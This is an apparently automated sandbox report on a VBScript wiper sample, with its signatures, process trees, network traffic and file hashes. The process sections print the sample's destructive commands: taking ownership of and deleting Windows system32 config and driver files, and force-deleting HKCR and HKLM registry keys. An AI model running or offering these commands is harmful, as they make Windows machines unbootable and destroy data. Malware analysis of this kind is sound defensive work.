Malware Analysis Report

2024-11-16 12:52

Sample ID 240815-1krv7a1blp
Target code.vbs
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf

Threat Level: Likely malicious

The file code.vbs was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Checks computer location settings

Enumerates physical storage devices

Modifies registry key

Runs regedit.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-15 21:42

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-15 21:42

Reported

2024-08-15 21:45

Platform

win7-20240729-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2108 wrote to memory of 2356 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1616 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2356 wrote to memory of 1856 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2628 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1856 wrote to memory of 2156 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1616 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 1856 wrote to memory of 1812 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\system32\wbem\WMIADAP.EXE

wmiadap.exe /F /T

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

MD5 57a8ed12915b612b81ec573f56394818
SHA1 f834294e6d6a7150da076670825857960df8a7a2
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

C:\Users\Admin\Desktop\GrantUpdate.vbs

MD5 1fafd3091b9297603ea9989bed793089
SHA1 03688ce88040e39d04ec4a182427cf0992c827d6
SHA256 84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA512 8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571

C:\Users\Admin\Downloads\OpenPublish.wav

MD5 81051bcc2cf1bedf378224b0a93e2877
SHA1 ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA512 1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-15 21:42

Reported

2024-08-15 21:43

Platform

win10v2004-20240802-en

Max time kernel

46s

Max time network

48s

Command Line

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3888 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3888 wrote to memory of 3364 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WScript.exe
PID 3364 wrote to memory of 2708 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2708 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3364 wrote to memory of 2712 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2708 wrote to memory of 4672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2708 wrote to memory of 4672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2712 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2712 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2708 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2708 wrote to memory of 4828 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2712 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2712 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3364 wrote to memory of 1540 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 1540 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 2604 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 2604 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 3324 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe
PID 3364 wrote to memory of 3324 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "copy C:\Users\Admin\AppData\Local\Temp\code.wsf C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\config\*

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\config\* /grant everyone:(f)

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant everyone:(f)

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.dll /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKCR\*.exe /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" delete HKLM\* /f

C:\Windows\regedit.exe

"C:\Windows\regedit.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 36.58.20.217.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\code.wsf.vbs

MD5 57a8ed12915b612b81ec573f56394818
SHA1 f834294e6d6a7150da076670825857960df8a7a2
SHA256 0461ce4eb37d43545491e5d2a9c42b673669378cba5cfa141be1cc0280dfdedf
SHA512 2bdfeff4bd4ce78baeeddca3be307c1ca263034703e4bbccbe360b9cc32c43df0fa2279e893b4ebbf3a27832de6d575dff6297b4ae16dba628e7c7115897ca68

C:\Users\Admin\Desktop\ConvertToMove.vbs

MD5 1fafd3091b9297603ea9989bed793089
SHA1 03688ce88040e39d04ec4a182427cf0992c827d6
SHA256 84a4fba54d165a54fdb5e5fff87530ebf488e5da855cadac11d54582858e67ac
SHA512 8273cf8d90b26a8247e8ac0317c1266a5ae24ba82dffe5f8b7ca46cb5ab8746aaf1eea089a4a6c1a9c612bb7d6f69ea944ed55c113e4da01d4cf53ac8cd44571